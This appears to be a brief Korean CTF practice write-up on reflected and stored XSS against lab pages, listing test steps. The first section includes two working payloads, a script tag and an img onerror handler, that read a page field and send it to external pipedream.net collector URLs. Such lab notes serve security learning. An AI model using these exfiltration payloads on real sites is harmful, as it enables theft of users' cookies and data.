CTF - Basic Script Prac
mypage.php
-
저장되고 출력되는 위치 확인
-
특수문자 <’”> 사용 가능한 지 확인
-
<script>alert(1)</script>로 Reflected XSS 공격이 가능한 지 확인
-
data 탈취
- 공격 코드 1
"> <script> window.addEventListener('DOMContentLoaded', function() { let e = document.querySelectorAll('input')[1].placeholder; let i = new Image(); i.src = 'https://eoxee0fw4m1u2sw.m.pipedream.net/?cookie=' + e; }); </script> - 공격 코드 2
"> <img src=. onerror=" let e = document.querySelectorAll('input')[1].placeholder; let i = new Image(); i.src = 'https://eot2jevtyijbm2l.m.pipedream.net/?cookie=' + e; ">
CTF - Steal Info
notice_list.php
-
저장되고 출력되는 위치 확인
-
특수문자 <’”> 사용 가능한 지 확인
-
<script>alert(1)</script>로 XSS 공격이 가능한 지 확인
-
data 탈취
- 공격 코드
CTF - Steal Info 2
notice_list.php
-
저장되고 출력되는 위치 확인
-
특수문자 <’”> 사용 가능한 지 확인
-
<script>alert(1)</script>로 Stored XSS 공격이 가능한 지 확인
-
data 탈취
- 공격 코드
Comments